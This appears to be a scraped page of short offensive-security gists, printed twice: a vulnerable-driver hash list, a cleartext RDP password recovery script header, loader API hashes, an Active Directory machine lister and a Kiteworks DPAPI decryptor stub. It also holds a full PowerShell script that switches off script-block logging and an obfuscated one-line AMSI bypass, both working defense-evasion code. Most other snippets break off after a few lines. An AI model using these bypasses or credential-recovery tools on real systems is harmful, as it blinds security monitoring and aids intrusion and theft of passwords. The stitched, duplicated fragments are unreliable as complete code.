k4nfr3

## ioc_vulnerable_drivers.csv
SHA256,Name,Signer,Description
04A85E359525D662338CAE86C1E59B1D7AA9BD12B920E8067503723DC1E03162,ADV64DRV.sys,"""FUJITSU LIMITED """,
05F052C64D192CF69A462A5EC16DDA0D43CA5D0245900C9FCB9201685A2E7748,Agent64.sys,"""eSupport.com, Inc.""",DriverAgent Direct I/O for 64-bit Windows
4045AE77859B1DBF13972451972EAAF6F3C97BEA423E9E78F1C2F14330CD47CA,Agent64.sys,Phoenix Technologies Ltd,DriverAgent Direct I/O for 64-bit Windows
6948480954137987A0BE626C24CF594390960242CD75F094CD6AAA5C2E7A54FA,Agent64.sys,Phoenix Technologies Ltd,DriverAgent Direct I/O for 64-bit Windows
8CB62C5D41148DE416014F80BD1FD033FD4D2BD504CB05B90EEB6992A382D58F,Agent64.sys,"""eSupport.com, Inc""",DriverAgent Direct I/O for 64-bit Windows
B1D96233235A62DBB21B8DBE2D1AE333199669F67664B107BFF1AD49B41D9414,Agent64.sys,"""eSupport.com, Inc.""",DriverAgent Direct I/O for 64-bit Windows
7196187FB1EF8D108B380D37B2AF8EFDEB3CA1F6EEFD37B5DC114C609147216D,ALSysIO64.sys,Artur Liberman,ALSysIO
7F375639A0DF7FE51E5518CF87C3F513C55BC117DB47D28DA8C615642EB18BFA,ALSys

## RDP_clear.py
import re
from collections import namedtuple
import sys

# Clear text password recovery from mem dump as found by @jonasLyk Tweet : https://twitter.com/jonasLyk/status/1393058962942083076
# borrowed python code from Willi Ballenthin -> https://gist.github.com/williballenthin/8e3913358a7996eab9b96bd57fc59df2
# code inspired by  @gentilkiwi 's video
# This is for those who like me wanted to play with this discovery a little and dirty python3 script while waiting to see another module in the great mimikatz tool
# I'm no dev so PR and constructive remarks are welcome

## Disable-ScriptBlockLogBypass.ps1
$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
If ($GroupPolicyField) {
    $GroupPolicyCache = $GroupPolicyField.GetValue($null)
    If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
        $GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
        $GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
    }
    $val = [System.Collections.Generic.Dictionary[string,System.Object]]::new()
    $val.Add('EnableScriptB'+'lockLogging', 0)
    $val.Add('EnableScriptB'+'lockInvocationLogging', 0)

## am.ps1
Write-Host '[+] Loading AMSI Bypass...'
S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x')) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U')+'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"(${n`ULl},${t`RuE} )
Write-Host '[+] done' -ForegroundColor green

## gist:9498becaa9d248b4ed84931080e1bf01
Scrapped from official web site: https://downloads.rclone.org/v.../SHA1SUMS
===========================================================================
Windows Clients

ecce335a75b0f8678ba0494b178f3b41309b72be  rclone-current-windows-386.zip
0d9e1fd984d0ab5312060024ab6498046562c134  rclone-current-windows-amd64.zip
ecce335a75b0f8678ba0494b178f3b41309b72be  rclone-v1.40-windows-386.zip
0d9e1fd984d0ab5312060024ab6498046562c134  rclone-v1.40-windows-amd64.zip
18d6a87012de120c66b5abaa97f5932fe56beee7  rclone-v1.41-windows-386.zip
6f4bee89380b70742ba7d37c80da0f0b4f890612  rclone-v1.41-windows-amd64.zip

## IORI_Loader 0x99 hash of functions
'ntdll.dll' '4097367' '0x3e8557'
'RegNtCallbackObjectContextCleanup' '1094975913383384674' '0xf3222cab2d35662'
'RegNtPostCreateKey' '76320549262' '0x11c50f298e'
'RegNtPostCreateKeyEx' '686884943685' '0x9fed887745'
'RegNtPostDeleteKey' '76320533467' '0x11c50eebdb'
'RegNtPostDeleteValueKey' '18545889663766' '0x10de0d2a5b16'
'RegNtPostEnumerateKey' '2060655325624' '0x1dfc8a0f1b8'
'RegNtPostEnumerateValueKey' '500739244157917' '0x1c76b70c5ebdd'
'RegNtPostFlushKey' '25440190120' '0x5ec5a7ea8'
'RegNtPostKeyHandleClose' '18545901133010' '0x10de0dd95cd2'

## DOH client test
#!/usr/bin/env python

from __future__ import print_function

import json
import re
import socket
import ssl
import subprocess
import sys

## list_machines.py
#!/usr/bin/env python
# modifications of original script GetAdusers.py from Impacket.
# this version returns the list of last seen 24h machines
#python list_machines.py TIMATEC.local/fbu -dc-ip 192.168.16.11
#Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
#
#Password:
#[*] Querying 192.168.16.11 for information about domain.
#Name                  PasswordLastSet             LastLogon                   OperatingSystemVersion  OperatingSystem                          IP Address
#--------------------  --------------------------  --------------------------  ----------------------  ---------------------------------------  ------------

## velocity.py
import requests
import json

# Proxy settings fo debug (with burp or other)
proxy_enable = False
proxy = {
    'http': 'http://127.0.0.1:8080',
    'https': 'http://127.0.0.1:8080'
}

## Kiteworks_DPAPI_session.cfg_decryptor
Add NugetComponent Microsoft.Win32.Registry
Add NugetComponent System.Security.Cryptography.ProtectedData

Program.cs based on https://github.com/sergeig888/csharp-dpapi-PBIE/
Tested on lates version Kiteworks 8.3.0

=========================================
/* Created by Sergei Gundorov 1/2/2020
 * Intent: provide sample project for encrypting secrets with DPAPI while working with
 * Power BI Embedded and API tutorials and samples.
	SHA256,Name,Signer,Description
	04A85E359525D662338CAE86C1E59B1D7AA9BD12B920E8067503723DC1E03162,ADV64DRV.sys,"""FUJITSU LIMITED """,
	05F052C64D192CF69A462A5EC16DDA0D43CA5D0245900C9FCB9201685A2E7748,Agent64.sys,"""eSupport.com, Inc.""",DriverAgent Direct I/O for 64-bit Windows
	4045AE77859B1DBF13972451972EAAF6F3C97BEA423E9E78F1C2F14330CD47CA,Agent64.sys,Phoenix Technologies Ltd,DriverAgent Direct I/O for 64-bit Windows
	6948480954137987A0BE626C24CF594390960242CD75F094CD6AAA5C2E7A54FA,Agent64.sys,Phoenix Technologies Ltd,DriverAgent Direct I/O for 64-bit Windows
	8CB62C5D41148DE416014F80BD1FD033FD4D2BD504CB05B90EEB6992A382D58F,Agent64.sys,"""eSupport.com, Inc""",DriverAgent Direct I/O for 64-bit Windows
	B1D96233235A62DBB21B8DBE2D1AE333199669F67664B107BFF1AD49B41D9414,Agent64.sys,"""eSupport.com, Inc.""",DriverAgent Direct I/O for 64-bit Windows
	7196187FB1EF8D108B380D37B2AF8EFDEB3CA1F6EEFD37B5DC114C609147216D,ALSysIO64.sys,Artur Liberman,ALSysIO
	7F375639A0DF7FE51E5518CF87C3F513C55BC117DB47D28DA8C615642EB18BFA,ALSys
	import re
	from collections import namedtuple
	import sys

	# Clear text password recovery from mem dump as found by @jonasLyk Tweet : https://twitter.com/jonasLyk/status/1393058962942083076
	# borrowed python code from Willi Ballenthin -> https://gist.github.com/williballenthin/8e3913358a7996eab9b96bd57fc59df2
	# code inspired by @gentilkiwi 's video
	# This is for those who like me wanted to play with this discovery a little and dirty python3 script while waiting to see another module in the great mimikatz tool
	# I'm no dev so PR and constructive remarks are welcome
	$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
	If ($GroupPolicyField) {
	$GroupPolicyCache = $GroupPolicyField.GetValue($null)
	If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
	$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
	$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
	}
	$val = [System.Collections.Generic.Dictionary[string,System.Object]]::new()
	$val.Add('EnableScriptB'+'lockLogging', 0)
	$val.Add('EnableScriptB'+'lockInvocationLogging', 0)
	Write-Host '[+] Loading AMSI Bypass...'
	S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x')) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U')+'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"(${n`ULl},${t`RuE} )
	Write-Host '[+] done' -ForegroundColor green
	Scrapped from official web site: https://downloads.rclone.org/v.../SHA1SUMS
	===========================================================================
	Windows Clients

	ecce335a75b0f8678ba0494b178f3b41309b72be rclone-current-windows-386.zip
	0d9e1fd984d0ab5312060024ab6498046562c134 rclone-current-windows-amd64.zip
	ecce335a75b0f8678ba0494b178f3b41309b72be rclone-v1.40-windows-386.zip
	0d9e1fd984d0ab5312060024ab6498046562c134 rclone-v1.40-windows-amd64.zip
	18d6a87012de120c66b5abaa97f5932fe56beee7 rclone-v1.41-windows-386.zip
	6f4bee89380b70742ba7d37c80da0f0b4f890612 rclone-v1.41-windows-amd64.zip
	'ntdll.dll' '4097367' '0x3e8557'
	'RegNtCallbackObjectContextCleanup' '1094975913383384674' '0xf3222cab2d35662'
	'RegNtPostCreateKey' '76320549262' '0x11c50f298e'
	'RegNtPostCreateKeyEx' '686884943685' '0x9fed887745'
	'RegNtPostDeleteKey' '76320533467' '0x11c50eebdb'
	'RegNtPostDeleteValueKey' '18545889663766' '0x10de0d2a5b16'
	'RegNtPostEnumerateKey' '2060655325624' '0x1dfc8a0f1b8'
	'RegNtPostEnumerateValueKey' '500739244157917' '0x1c76b70c5ebdd'
	'RegNtPostFlushKey' '25440190120' '0x5ec5a7ea8'
	'RegNtPostKeyHandleClose' '18545901133010' '0x10de0dd95cd2'
	#!/usr/bin/env python

	from __future__ import print_function

	import json
	import re
	import socket
	import ssl
	import subprocess
	import sys
	#!/usr/bin/env python
	# modifications of original script GetAdusers.py from Impacket.
	# this version returns the list of last seen 24h machines
	#python list_machines.py TIMATEC.local/fbu -dc-ip 192.168.16.11
	#Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
	#
	#Password:
	#[*] Querying 192.168.16.11 for information about domain.
	#Name PasswordLastSet LastLogon OperatingSystemVersion OperatingSystem IP Address
	#-------------------- -------------------------- -------------------------- ---------------------- --------------------------------------- ------------
	import requests
	import json

	# Proxy settings fo debug (with burp or other)
	proxy_enable = False
	proxy = {
	'http': 'http://127.0.0.1:8080',
	'https': 'http://127.0.0.1:8080'
	}
	Add NugetComponent Microsoft.Win32.Registry
	Add NugetComponent System.Security.Cryptography.ProtectedData

	Program.cs based on https://github.com/sergeig888/csharp-dpapi-PBIE/
	Tested on lates version Kiteworks 8.3.0

	=========================================
	/* Created by Sergei Gundorov 1/2/2020
	* Intent: provide sample project for encrypting secrets with DPAPI while working with
	* Power BI Embedded and API tutorials and samples.